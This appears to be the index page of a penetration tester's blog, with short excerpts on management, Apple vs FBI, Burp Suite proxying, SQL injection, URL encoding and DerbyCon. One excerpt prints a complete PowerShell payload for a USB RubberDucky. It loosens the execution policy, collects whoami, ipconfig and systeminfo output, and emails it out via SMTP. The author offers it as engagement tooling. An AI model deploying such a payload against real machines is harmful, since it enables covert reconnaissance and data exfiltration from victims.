The Management Feedback Cycle

I planned a post covering the Manager Feedback Cycle, but this blog post at Effective Managers covers most of what I was going to communicate. One thing I would add to this resource is that both managers and subordinates should strike a balance in communication frequency: if communication is infrequent, important details can get overlooked, and it becomes harder to resolve conflicts. If communication is too frequent, the subordinate will feel like they’re being micro-managed while the manager will feel like the subordinate can’t solve problems on their own.

April 15, 2016 · 1 min · Chris

Apple VS FBI

Apple gets a lot of flak in the InfoSec community, even though it’s an open secret that much of the InfoSec community has begun to use Apple products. I myself have been using a Mac laptop for the past ten years because they produced the first laptop I thought was worth spending money on. A lot of money. I’m a fan of Apple for more than just their products, however. I admire their stance on social issues that I care about. ...

March 28, 2016 · 4 min · Chris

Static Sites in 2016

It’s early 2016, and there are a multitude of content management systems and blog platforms out there: Wikipedia’s List of Content Management Systems. The security blog I contribute to, Penetrate.IO, runs on the venerable Wordpress and requires constant updates to stay one step ahead of attackers. This becomes tiresome after a while, especially since the only thing I’m interested in hosting is a series of articles. These don’t require server-side computation, simply hosting. It’s a little like web development from the late ’90s: I only require simple HTTP hosting. ...

March 25, 2016 · 7 min · Chris

Configure an Upstream Proxy for Burpsuite

I had the need to proxy traffic from Burpsuite to another proxy during web app testing this week. There are a few ways to do this, but this method was the easiest since I already had Burpsuite’s TLS certificate installed. For more information on this, see the Burpsuite help. To configure an upstream proxy for Burpsuite, such as OWASP ZAP, follow these steps: First, configure your upstream proxy that will sit between Burpsuite and the web application to listen on a different port, since they both bind TCP 8080 by default. Here I’ve configured ZAP to listen on port 8082: ...

November 5, 2015 · 1 min · Chris

Make a connection

This post was inspired by a client who came to me and said “I do not understand all of these findings, can you explain them to me?”, referring to my web application penetration test deliverable. We spoke for an hour, as I described the findings to him. I corrected him when his understanding was shaky, and I confirmed where his understanding was solid. He had a development background, and was studying for a security certification, but he was managing a large security project for a well-known company and I was surprised to learn he was a security newbie. At the end of our conversation, he thanked me and said “Now I understand, and I’ll make sure my manager does as well!” ...

September 18, 2015 · 3 min · Chris

My Security 101

What I hope are some reasonable basic security practice recommendations

January 20, 2015 · 1 min · Chris

RubberDucky Powershell Payload

On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments:

# Set execution policy to allow unrestricted script scope
Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
#Create results file in current user's temp directory
$results = $env:temp + '\results.txt'
#Run whoami
$who = 'whoami.exe'
$rwho = & $who
#Run ipconfig /all
$ipc = 'ipconfig.exe'
$ipcs = '/all'
$ripc = & $ipc $ipcs
#Run systeminfo
$sysi = 'systeminfo.exe'
$rsysi = & $sysi
#Wait for systeminfo to finish
Start-Sleep -s 5
#Write results
$output = $rwho + $ripc + $rsysi | Out-File $results
#Send results to e-mail address
$hostname = $env:computername
$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredentials('<yourusername>', '<yourpassword>')
$ResultMail = New-Object System.Net.Mail.MailMessage
$ResultMail.From = '<fromaddress>'
$ResultMail.To.Add('<destinationmail>')
$ResultMail.Subject = "Mail Subject"
$ResultMail.Body = "Mail Body"
$ResultMail.Attachments.Add($results)
$SMTPInfo.Send($ResultMail)
#Optional pop-up confirmation box
#Note: This WILL raise user suspicion
$wshell = New-Object -ComObject Wscript.Shell
$wshell.Popup("Operation Complete.", 0, "OK", 0x1)

Merry Christmas and Happy Holidays! ...

December 22, 2014 · 1 min · Chris

PHP, MySql, and Injection

Inspired by Jack Daniel’s “Shoulders of InfoSec Project”, this post will be focused on the people and technologies behind one of the most prevalent attacks on web sites: SQL injection. According to OWASP, injection is the number one attack vector for web applications. Injection attacks can target many different contexts in a web application: HTML, PHP, ASP, Javascript, SQL, etc. Any context in which an interpreter parses input to execute instructions is potentially vulnerable to an injection attack. There are several - many, rather - excellent tutorials on Injection attacks available on the web. Here’s a brief selection of SQL injection attacks for reference: ...

November 26, 2014 · 12 min · Chris

URL Encoding

URL Syntax

https://admin:pass123@www.example.com:80/bio.txt;pp=1&qp=2#Three

URL Part          URL Data
Scheme            https
User              admin
Password          pass123
Subdomain         www
Domain            example.com
Port              80
Path              /bio.txt
Path Parameter    pp=1
Query Parameter   qp=2
Fragment          Three

Safe Characters

RFC1738 section 2.2 outlines the safe characters to use in an HTTP URL Scheme: abcdefghijklmnopqrstuvwxyz0123456789$-_.+!*'(),

Safe characters can be used in URLs without any form of encoding as they aren’t reserved for special use in the construction of the URL. ...

October 6, 2014 · 2 min · Chris

DerbyCon 4.0

Unfortunately, I didn’t arrive at the ballroom early enough to get seats, or even standing room, to see this talk in-person: Ed Skoudis: How To Give The Best Pen Test Of Your Life. If you’re a Pen Tester, this talk is a must-see. Once you’ve finished that talk, check out John Strand’s excellent follow-up talk! After competing for Friday night, most of Saturday, and Sunday morning, I emerged in 30th position (solo) out of the 120 teams competing in the CTF. Not bad, but I want to do better! ...

October 1, 2014 · 1 min · Chris